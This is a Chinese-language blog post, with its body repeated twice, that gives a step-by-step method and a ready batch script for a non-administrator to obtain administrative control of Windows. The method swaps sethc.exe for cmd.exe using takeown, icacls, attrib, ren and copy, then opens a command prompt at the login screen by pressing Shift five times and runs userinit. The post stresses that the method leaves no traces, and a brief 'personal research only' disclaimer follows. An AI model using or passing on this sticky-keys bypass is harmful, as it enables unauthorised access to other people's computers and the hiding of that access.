最简单非管理员破解系统管理权限方法
2011-12-28 22:45
483 查看
步骤如下:
1.备份sethc.exe
2.复制cmd.exe并改名为sethc.exe后替换system32文件夹下原有sethc.exe
3.到系统登陆界面下按5次Shift,出现命令行窗口(已用非管理员帐户登陆的先logoff)
4.输入 userinit 回车……(关键在此:网上的破解方法都是用net命令添加帐户并提升为管理员组,但这样会创建新用户,并且命令操作太多……新手记不住~~而且想不留痕迹还要删掉创建的帐户,删掉帐户文件夹……这又要很多命令执行~~~)
这样你会发现依然是在登陆界面,但下面出现了任务栏和开始菜单……
点击开始-几乎所有的操作都能做了……而且不会创建帐户,不留痕迹……
脚本:
-----------------------------------------------------------------
rem vista及以后系统要用以下两条命令,去掉以下两条命令的rem即可
rem takeown /f %SystemRoot%\system32\sethc.exe
rem icacls %SystemRoot%\system32\sethc.exe /grant administrators:F
rem xp及以下系统可以直接从这里开始
attrib %SystemRoot%\system32\sethc.exe -s -h -r
rem 去除sethc.exe 特殊属性
ren %SystemRoot%\system32\sethc.exe %SystemRoot%\system32\sethc.exe.bak
rem 备份sethc.exe(网上大多是复制备份再删除源文件,其实直接改名效果是一样的)
copy %SystemRoot%\system32\cmd.exe %SystemRoot%\system32\sethc.exe
rem 复制cmd为sethc
logoff
rem 注销
----------------------------------------------------------------
执行以上脚本后再在登陆界面按5次Shift,输入userinit回车即可~
声明:本命令脚本只供个人研究使用,不得用于非法目的,因使用本脚本造成任何后果,本人概不负责!
1.备份sethc.exe
2.复制cmd.exe并改名为sethc.exe后替换system32文件夹下原有sethc.exe
3.到系统登陆界面下按5次Shift,出现命令行窗口(已用非管理员帐户登陆的先logoff)
4.输入 userinit 回车……(关键在此:网上的破解方法都是用net命令添加帐户并提升为管理员组,但这样会创建新用户,并且命令操作太多……新手记不住~~而且想不留痕迹还要删掉创建的帐户,删掉帐户文件夹……这又要很多命令执行~~~)
这样你会发现依然是在登陆界面,但下面出现了任务栏和开始菜单……
点击开始-几乎所有的操作都能做了……而且不会创建帐户,不留痕迹……
脚本:
-----------------------------------------------------------------
rem vista及以后系统要用以下两条命令,去掉以下两条命令的rem即可
rem takeown /f %SystemRoot%\system32\sethc.exe
rem icacls %SystemRoot%\system32\sethc.exe /grant administrators:F
rem xp及以下系统可以直接从这里开始
attrib %SystemRoot%\system32\sethc.exe -s -h -r
rem 去除sethc.exe 特殊属性
ren %SystemRoot%\system32\sethc.exe %SystemRoot%\system32\sethc.exe.bak
rem 备份sethc.exe(网上大多是复制备份再删除源文件,其实直接改名效果是一样的)
copy %SystemRoot%\system32\cmd.exe %SystemRoot%\system32\sethc.exe
rem 复制cmd为sethc
logoff
rem 注销
----------------------------------------------------------------
执行以上脚本后再在登陆界面按5次Shift,输入userinit回车即可~
声明:本命令脚本只供个人研究使用,不得用于非法目的,因使用本脚本造成任何后果,本人概不负责!
相关文章推荐
- 典型的简单权限分配系统方法介绍
- 关于运行VBS文件提示“没有在该机执行windows脚本宿主的权限。请与系统管理员联系。”错误的解决方法
- Win7 系统权限不足需要管理员权限 解决方法
- windows10家庭版系统获取不了管理权限的两种解决方法
- 一种简单方便的用户权限管理方法--使用菜单来管理用户权限(下)
- spirngMVC+Hibernate+SpringSecuirty+Extjs一个简单的权限管理系统
- 构建ASP.NET MVC4+EF5+EasyUI+Unity2.x注入的后台管理系统(25)-权限管理系统-系统管理员(附生成器)
- windows 8 非内置系统管理员获得完整权限的方法
- 清理吉日嘎拉走火入魔C#.NET通用权限管理系统组件表数据的脚本方法参考
- Windouws7 下提示您使用非管理权限登录,无法创建和修改系统DSN的解决方法
- IE的Internet选项中,下方提示“某些设置由系统管理员管理”的解决方法
- SpringMvc+hibernate+easyui简单的权限管理系统
- javaweb+SSH实现简单的权限管理系统
- Win8非内置系统管理员获得完整权限的方法
- win7系统 没有足够的权限卸载软件请与系统管理员联系 解决方法
- 通用权限管理系统组件 (GPM - General Permissions Manager) 中最简单的例子程序,如何时间通讯录管理
- 打击走火入魔C#.NET通用权限管理系统组件盗版采取的方法
- Win8非内置系统管理员获得完整权限的方法
- 打击走火入魔C#.NET通用权限管理系统组件盗版采取的方法
- B/S系统权限控制的一种简单方法(转)